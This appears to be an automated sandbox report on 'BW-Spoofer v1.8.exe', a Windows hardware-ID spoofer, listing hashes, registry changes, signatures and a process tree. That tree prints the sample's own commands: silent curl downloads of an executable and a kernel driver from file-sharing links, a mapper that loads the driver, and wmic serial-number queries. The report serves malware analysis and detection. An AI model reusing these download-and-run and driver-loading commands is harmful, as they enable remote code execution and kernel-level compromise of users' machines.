Analysis
  max time kernel: 35s
  max time network: 38s
  platform: windows10-2004_x64
  resource: win10v2004-20240412-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 19/04/2024, 06:39
Static task: static1
Behavioral task: behavioral1
  Sample: BW-Spoofer v1.8.exe
  Resource: win10v2004-20240412-en
General
  Target: BW-Spoofer v1.8.exe
  Size: 608KB
  MD5: 80b055d3c394b8d67a3471209baaffff
  SHA1: fc91bae8f742757c369ece9708c90cb45bd38a84
  SHA256: 421adb3b2479b676edb2e536abadf8063b0bf56f50732a06e0c59afb7ed995b3
  SHA512: e75b76d7c776a85aa3f14de4e0da983b8997b811901f30b153234a05a01b9b18aee4729189e7195b98f696c35b6d7032ef8b6bfee307307f4a9be09ab8ee30fb
  SSDEEP: 12288:f+Q/fzJitK/Ujd7c9c+l3xa5yGsi+1u3ENf:f+QjJitMUJ7+l3xULsc3E5
Malware Config
Signatures
Downloads MZ/PE file

Sets service image path in registry (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VJNrGntiJlzQwIWsLpS\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\VJNrGntiJlzQwIWsLpS" (process: mapv2.exe)

Executes dropped EXE (1 IoC)
  PID 3528: mapv2.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 51: discord.com
  flow 52: discord.com

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (process: msedge.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (process: msedge.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (process: msedge.exe)

Modifies registry class (1 IoC)
  Key created: \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-259785868-298165991-4178590326-1000\{48D78BC9-8461-485A-B8F4-2D6C12DFCFB2} (process: msedge.exe)

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 4808: BW-Spoofer v1.8.exe (all 64 entries)

Suspicious behavior: LoadsDriver (1 IoC)
  PID 3528: mapv2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (4 IoCs)
  PID 3376: msedge.exe (all 4 entries)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  PID 3528 mapv2.exe: Token: SeLoadDriverPrivilege
  PID 1464 WMIC.exe, the following token sequence recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 468 WMIC.exe, the same token sequence recorded once: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of FindShellTrayWindow (26 IoCs)
  PID 3376: msedge.exe (all 26 entries)

Suspicious use of SendNotifyMessage (24 IoCs)
  PID 3376: msedge.exe (all 24 entries)

Suspicious use of WriteProcessMemory (64 IoCs)
  PID 4808 (BW-Spoofer v1.8.exe) wrote to memory of 3496, procid_target 87 (2 entries)
  PID 3496 (cmd.exe) wrote to memory of 216, procid_target 88 (2 entries)
  PID 3496 (cmd.exe) wrote to memory of 5116, procid_target 89 (2 entries)
  PID 3496 (cmd.exe) wrote to memory of 4728, procid_target 90 (2 entries)
  PID 4808 (BW-Spoofer v1.8.exe) wrote to memory of 1164, procid_target 94 (2 entries)
  PID 4808 (BW-Spoofer v1.8.exe) wrote to memory of 2632, procid_target 95 (2 entries)
  PID 4808 (BW-Spoofer v1.8.exe) wrote to memory of 2808, procid_target 96 (2 entries)
  PID 4808 (BW-Spoofer v1.8.exe) wrote to memory of 3376, procid_target 98 (2 entries)
  PID 3376 (msedge.exe) wrote to memory of 1052, procid_target 99 (2 entries)
  PID 3376 (msedge.exe) wrote to memory of 1780, procid_target 101 (40 entries)
  PID 3376 (msedge.exe) wrote to memory of 4752, procid_target 102 (2 entries)
  PID 3376 (msedge.exe) wrote to memory of 912, procid_target 103 (4 entries)
Processes
(Tree depth in brackets; each entry gives the image path, PID, the recorded command line and the signatures attached to that process.)

[1] C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe (PID 4808)
    cmd: "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe (PID 3496)
      cmd: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\certutil.exe (PID 216)
        cmd: certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe" MD5
    [3] C:\Windows\system32\find.exe (PID 5116)
        cmd: find /i /v "md5"
    [3] C:\Windows\system32\find.exe (PID 4728)
        cmd: find /i /v "certutil"
  [2] C:\Windows\system32\cmd.exe (PID 1164)
      cmd: C:\Windows\system32\cmd.exe /c color D
  [2] C:\Windows\system32\cmd.exe (PID 2632)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 2808)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3376)
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://beatware.xyz/discord
      - Enumerates system info in registry
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1052)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffecc7046f8,0x7ffecc704708,0x7ffecc704718
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1780)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4752)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 912)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1232)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1188)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1196)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4340)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5016)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3860 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3348)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4892 /prefetch:8
        - Modifies registry class
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 1836)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3124)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
  [2] C:\Windows\system32\cmd.exe (PID 2316)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 4532)
      cmd: C:\Windows\system32\cmd.exe /c color D
  [2] C:\Windows\system32\cmd.exe (PID 4936)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 3160)
      cmd: C:\Windows\system32\cmd.exe /c color D
  [2] C:\Windows\system32\cmd.exe (PID 1188)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 1448)
      cmd: C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jv77rvcr2fbthhfxsdqj4tz55nua/bw-ontop%2Ffree%2Fbwmapper.exe?download=1 -o C:\Windows\Temp\mapv2.exe --silent
    [3] C:\Windows\system32\curl.exe (PID 840)
        cmd: curl https://link.storjshare.io/s/jv77rvcr2fbthhfxsdqj4tz55nua/bw-ontop%2Ffree%2Fbwmapper.exe?download=1 -o C:\Windows\Temp\mapv2.exe --silent
  [2] C:\Windows\system32\cmd.exe (PID 1488)
      cmd: C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jxw2m5pxqvcndnlpkcyfj63g2niq/bw-ontop%2Finjected%20ud%20is%20ud.sys?download=1 -o \Windows\Temp\drvv5.sys --silent
    [3] C:\Windows\system32\curl.exe (PID 4124)
        cmd: curl https://link.storjshare.io/s/jxw2m5pxqvcndnlpkcyfj63g2niq/bw-ontop%2Finjected%20ud%20is%20ud.sys?download=1 -o \Windows\Temp\drvv5.sys --silent
  [2] C:\Windows\system32\cmd.exe (PID 2024)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 3208)
      cmd: C:\Windows\system32\cmd.exe /c cd C:\Windows\Temp\ && mapv2.exe drvv5.sys
    [3] C:\Windows\Temp\mapv2.exe (PID 3528)
        cmd: mapv2.exe drvv5.sys
        - Sets service image path in registry
        - Executes dropped EXE
        - Suspicious behavior: LoadsDriver
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 2896)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 2260)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 3500)
      cmd: C:\Windows\system32\cmd.exe /c color D
  [2] C:\Windows\system32\cmd.exe (PID 2464)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 3052)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 2880)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 4884)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 2032)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 960)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 3688)
      cmd: C:\Windows\system32\cmd.exe /c color D
  [2] C:\Windows\system32\cmd.exe (PID 4656)
      cmd: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 4524)
      cmd: C:\Windows\system32\cmd.exe /c echo Diskdrive:
  [2] C:\Windows\system32\cmd.exe (PID 1600)
      cmd: C:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 1464)
        cmd: wmic diskdrive get serialnumber
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 3176)
      cmd: C:\Windows\system32\cmd.exe /c echo BIOS:
  [2] C:\Windows\system32\cmd.exe (PID 4580)
      cmd: C:\Windows\system32\cmd.exe /c wmic bios get serialnumber
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 468)
        cmd: wmic bios get serialnumber
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 1036)
      cmd: C:\Windows\system32\cmd.exe /c echo Motherboard:
  [2] C:\Windows\system32\cmd.exe (PID 4672)
      cmd: C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 4444)
        cmd: wmic baseboard get serialnumber
  [2] C:\Windows\system32\cmd.exe (PID 4872)
      cmd: C:\Windows\system32\cmd.exe /c echo Bios UUID:
  [2] C:\Windows\system32\cmd.exe (PID 2236)
      cmd: C:\Windows\system32\cmd.exe /c wmic path win32_computersystemproduct get uuid
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 1076)
        cmd: wmic path win32_computersystemproduct get uuid
  [2] C:\Windows\system32\cmd.exe (PID 528)
      cmd: C:\Windows\system32\cmd.exe /c echo Mac:
  [2] C:\Windows\system32\cmd.exe (PID 4120)
      cmd: C:\Windows\system32\cmd.exe /c getmac
    [3] C:\Windows\system32\getmac.exe (PID 4728)
        cmd: getmac
  [2] C:\Windows\system32\cmd.exe (PID 3996)
      cmd: C:\Windows\system32\cmd.exe /c pause >nul
[1] C:\Windows\System32\CompPkgSrv.exe (PID 1648)
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
[1] C:\Windows\System32\CompPkgSrv.exe (PID 4656)
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 152B
  MD5: 3d94406b964753cc5222ab1343f54bb1
  SHA1: a5e7de0781fa1fabb3cd89564f2e5693cb4dee16
  SHA256: fd9923a217cd8d2c44a63dbfe52ec262e7c80b1f1e50c6e0f21f8379c90e7762
  SHA512: 1ad2c144e7bbd809f400f8782586d3768fc82bcef39db986f766897c344efec77ab2c0b6d9c5ee2019ef5cf9ad0c46bdd25392cbc9dbf9ea80e800577f0fc598
- Filesize: 152B
  MD5: 49dde89f025a1cce8848473379f7c28f
  SHA1: b405956b33146b2890530e818b6aa74bba3afb88
  SHA256: d6d125ba686b825bb22ab967a346051780cab1f55fc68a2f3efdf3fb5598f96b
  SHA512: 53050344674d8886db66e25f42d97bf46b26229972631f857286c2a303897cda58d85ee8ca768bbfb1fc07e52567315ea85d57e39b5b382916700ec389946506
- Path: C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 864B
  MD5: 85c93cd3830ae6c765e73141a2956df0
  SHA1: 6962c4e2c4f5de72f86ed52ddfe798a8d438ca79
  SHA256: a55056b1f684f80de5ce9a612279e95dcc9cf39c814fe1d11a71fef2e64ce426
  SHA512: 9e6bf30c746c4214e37511ae63ded98b00d2deb9afea3245b9a3206650237346e828d2c0df7b160043ee2af5317c76303b8b5597908301cca57d8b2e85a0801d
- Filesize: 813B
  MD5: 18285e81786fd859cebf1cdf5268b108
  SHA1: 9d7a6bc3035143dd5757967d0799c87fb80637b7
  SHA256: f741d75610d7c6ba12145dc9b974350ffc8caa72a203e2e0c9c69ceb8aac0313
  SHA512: 08adfdcc43001d719065da797260a7650ee1a9c0a02677fae769be7359b8fab53db32a54c6775ae7390364e63695c8d6b8ea1eafd7865d9ead8003b7d368ea0a
- Filesize: 5KB
  MD5: b6da64b58dc031d8384323aaa7a7dd15
  SHA1: fc589f5944083aa4b741cbc3ce5e8e4b3e8d9af8
  SHA256: 2c35cd4219305daaae8949af82aedf242b68b87117f39cb158123965ab79962e
  SHA512: cf61f70e6c51092de55e252c6f0c141f6ba12a373b7e620562ad632badb5c58e0c0691b800b9c8f450a404491bc2ad94a79d21e2c761ec89e0685c8543771050
- Filesize: 7KB
  MD5: 9c1168181f38ff7403e693f768f4401d
  SHA1: 628090e370b8317cc96c102da4de04b3207dccd0
  SHA256: 163d247ffbdef93a7bbe1f4060dc27dfb58660880d57dd0a16b9d44e31264df2
  SHA512: 3a8fba4f4abdc9b19fd36cab108b5b0e6e83d9ecc4e49c70d2c41333ca8cc0b78ddb63b04e3e762d8d57da042c231a270e4a69b4226594a9d92be03b93c36c10
- Filesize: 24KB
  MD5: 7c43199d1e5acf5a31e1cbef990fbc47
  SHA1: df7bd524b9b3175325c0aff3469ea7f2211d3061
  SHA256: 52a6fd2a2fff53c738c77a6385e7e1677f8990781699f78c63d5a4b0fe566d22
  SHA512: aae886642b40ffb0676534fd85abe43ab588526b8e952b12a1bcafc73cb05103c76aee4fa32cc18c74af6c59aa1dc84bcda09ebccb7d11adc79fee3bfc93e2d1
- Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
- Filesize: 10KB
  MD5: 3dab013c5b140a53d98e5f75568053cb
  SHA1: 0f1d913ecf12c0b18cff533def5e92ca5f4aa082
  SHA256: d823c718891898c8b876a2d34f8d3fdcf42ba83fa53da82f490c81ca426b7885
  SHA512: c4d4c5876626aa2d695ae81469c437bc6947d9e9830bae8c83dd09401c817c44a658b3b9c6cc79369e7990cba6d19970d9bb49071eaa46d24f751a7f8613f110
- Filesize: 112KB
  MD5: e25351a9dd41d1c339530c465fe18569
  SHA1: 2461491598a2ab092b352f2caf375accde6e9d85
  SHA256: d38d41c4ef8b4ded6ddcba4d290231dc0521e9900ecd71c1db90d103fe19d869
  SHA512: 888ab312cda4d811254ab56d73238fd4419a2c3a3d59fbce3dfabe466ccd9081927389acdc740c9414cd380a6fb42bd881b7105cb444321d38a2f728333dc9d1